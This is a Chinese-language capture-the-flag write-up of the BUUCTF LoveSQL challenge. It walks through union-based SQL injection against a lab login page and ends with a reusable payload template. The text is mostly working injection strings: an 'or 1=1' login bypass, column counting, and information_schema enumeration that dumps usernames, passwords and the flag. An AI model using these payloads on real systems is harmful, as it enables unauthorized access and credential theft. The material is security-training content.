【BUUCTF】[极客大挑战 2019]LoveSQL 详细题解总结笔记 Writeup

一.SQL注入考点

基础知识点

union 联合查询
information表
group_concat()

注入流程

1.万能密码登陆
2.登陆后，使用联合查询注入
3.爆字段
4.看回显
5.爆数据库
6.爆数据库的表
7.爆出表的列
8.爆出flag

二. 解题过程

0.存在SQL注入

加单引号报错

/check.php?username=1'&password=2
/check.php?username=1&password=2'
/check.php?username=1'&password=2'

1.万能密码 admin’ or 1=1

或者
1’ or 1=1 #

账号
admin' or 1=1 #
密码
1

admin
47cb230740bc6725fd194aec8e479fc4

Tips：输入框的#，直接使用hackbar地址栏，需将#进行URL编码，即替换为%23

2.爆字段

check.php?username=admin ' order by 1 %23&password=1
check.php?username=admin ' order by 2 %23&password=1
check.php?username=admin ' order by 3 %23&password=1

check.php?username=admin ' order by 4 %23&password=1

改为4，报错，有3个字段

Unknown column '4' in 'order clause'

3.看回显

/check.php?username=1' union select 1,2,3%23&password=1

回显点位在2、3

4.爆数据库

check.php?username=1' union select 1,database(),version()%23&password=1

数据库名：geek
版本：10.3.18-MariaDB

5.爆数据库的表

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

数据库表名有：
geekuser
l0ve1ysq1
根据题目，表名应该就是l0ve1ysq1

6.爆出表的列

/check.php?username=
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'
%23&password=1

/check.php?username=
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'
%23&password=1

7.读取内容，爆flag

geekuser表

/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1

换一个
l0ve1ysq1表

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
/check.php?username=1' union select 1,2,group_concat(username,0x40,password) from l0ve1ysq1 %23&password=1
/check.php?username=1' union select 1,2,group_concat(username,0x40,0x40,password) from l0ve1ysq1 %23&password=1

Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{1cbf436f-3991-4300-9042-4f6c5f9e950f}'

Your password is 'cl4y@@wo_tai_nan_le,glzjin@@glzjin_wants_a_girlfriend,Z4cHAr7zCr@@biao_ge_dddd_hm,0xC4m3l@@linux_chuang_shi_ren,Ayrain@@a_rua_rain,Akko@@yan_shi_fu_de_mao_bo_he,fouc5@@cl4y,fouc5@@di_2_kuai_fu_ji,fouc5@@di_3_kuai_fu_ji,fouc5@@di_4_kuai_fu_ji,fouc5@@di_5_kuai_fu_ji,fouc5@@di_6_kuai_fu_ji,fouc5@@di_7_kuai_fu_ji,fouc5@@di_8_kuai_fu_ji,leixiao@@Syc_san_da_hacker,flag@@flag{2c52a50a-072c-4e80-aa81-3be3eddf604f}'

flag{1cbf436f-3991-4300-9042-4f6c5f9e950f}

三、提炼总结

爆字段

1' order by 1 #
1' order by 2 #
1' order by 3 #

1' order by 1 %23
1' order by 2 %23
1' order by 3 %23

看回显

1' union select 1,2,3 #

爆数据库

1' union select 1,database(),version() #

DATABASE,VERSION

爆数据库的表

只有一个数据库，省事直接相等

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

多个数据库，选择一个

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE'

AAA，BBB，CCC

爆出表的列

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #

读取内容，爆flag

读AAA表

1' union select 1,2,group_concat(id,username,password) from AAA%23&password=1

可以加ASCII码方便区别

1' union select 1,2,group_concat(username,0x40,password) from AAA%23&password=1